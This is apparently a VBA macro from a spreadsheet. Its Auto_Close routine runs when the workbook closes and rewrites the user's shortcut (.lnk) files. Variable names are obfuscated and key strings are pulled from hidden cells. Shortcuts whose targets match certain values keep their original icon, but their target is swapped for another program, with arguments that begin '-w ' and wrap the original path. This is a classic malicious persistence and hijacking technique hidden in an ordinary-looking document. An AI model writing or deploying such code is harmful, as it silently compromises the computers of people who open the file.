Sub Auto_Close()
Set FKOCqy = CreateObject(activeSheet.Range("AP65").value)
Set aRYNPhjWQ = CreateObject(activeSheet.Range("AQ65").value)
Set nckXaOB = aRYNPhjWQ.GetFolder(FKOCqy.SpecialFolders(activeSheet.Range("AS65").value))
For Each TiqIofNcF In nckXaOB.Files
If(InStr(Lcase(TiqIofNcF), ".lnk")) Then
Set JmeFBtUL = FKOCqy.CreateShortcut(FKOCqy.SPecialFolders(activeSheet.Range("AS65").value) & "\" & TiqIofNcF.name)
If(InStr(Lcase(JmeFBtUL.targetPath), activeSheet.Range("AU65").value) or InStr(Lcase(JmeFBtUL.targetPath), activeSheet.Range("AX65").value) or InStr(Lcase(JmeFBtUL.targetPath), activeSheet.Range("BA65").value)) Then
JmeFBtUL.IconLocation = JmeFBtUL.targetpath
JmeFBtUL.arguments = "-w " & activeSheet.Range("BE65").Value & JmeFBtUL.targetPath & "'" & activeSheet.Range("BF65").Value
JmeFBtUL.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BG65").value
if(Len(JmeFBtUL.arguments) < 1023) Then
JmeFBtUL.save
end if
end if
end if
next TiqIofNcF
End Sub
